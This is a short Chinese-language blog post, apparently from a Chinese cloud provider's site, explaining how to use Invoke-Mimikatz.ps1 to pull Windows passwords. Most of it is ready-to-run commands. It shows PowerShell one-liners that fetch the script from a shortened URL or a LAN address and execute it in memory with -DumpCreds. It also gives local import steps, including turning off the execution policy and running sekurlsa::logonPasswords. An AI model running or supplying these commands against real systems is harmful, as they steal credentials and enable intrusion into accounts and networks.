溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Invoke-Mimikatz.ps1獲取系統(tǒng)密碼

發(fā)布時(shí)間:2020-08-21 20:50:02 來(lái)源:網(wǎng)絡(luò) 閱讀:14139 作者:simeon2005 欄目:安全技術(shù)

(1)Invoke-Mimikatz.ps1下載地址

https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

(2)具備網(wǎng)絡(luò)環(huán)境直接執(zhí)行命令

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

(3)本地網(wǎng)絡(luò)環(huán)境

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/');Invoke-Mimikatz -DumpCreds"

(4)下載本地執(zhí)行

一句話執(zhí)行:

powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'

有授權(quán)限制的:

Get-ExecutionPolicy  //結(jié)果顯示restricted

Set-ExecutionPolicy Unrestricted  //打開(kāi)限制

Import-Module .\Invoke-Mimikatz.ps1 //導(dǎo)入命令

Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"' //獲取密碼


向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI